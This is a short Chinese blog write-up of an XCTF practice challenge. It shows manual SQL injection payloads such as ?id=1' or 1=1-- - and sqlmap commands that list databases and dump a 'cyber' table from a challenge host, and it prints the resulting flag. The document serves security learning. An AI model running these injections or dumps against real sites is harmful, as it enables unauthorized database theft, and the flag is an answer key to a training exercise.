前言

作者简介：不知名白帽，攻防网络安全学习者。世界

博客主页：https://blog.csdn.net/m0_63127854?攻防type=blog

攻防世界专栏：https://blog.csdn.net/m0_63127854/category_11983747.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

目录

题目场景

尝试SQL注入

尝试sqlmap注入

找到flag

题目场景

尝试SQL注入

?id=1' and 1=1-- -

?id=1' and 1=2-- -

?id=1' or 1=2-- -

都均无回显

?id=1' or 1=1-- -

回显出flag

Please enter ID,and Try to bypass

nice : congratulations

Flag Is : cyberpeace{ 76d13a6f794e1946a69a955eeb3d688d}

尝试sqlmap注入

sqlmap下载地址：http://sqlmap.org

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1"  -dbs

查看cyber表中数据

python sqlmap.py -u "http://61.147.171.105:56192/index.php?id=1"  -T cyber --dump

找到flag

cyberpeace{ 76d13a6f794e1946a69a955eeb3d688d}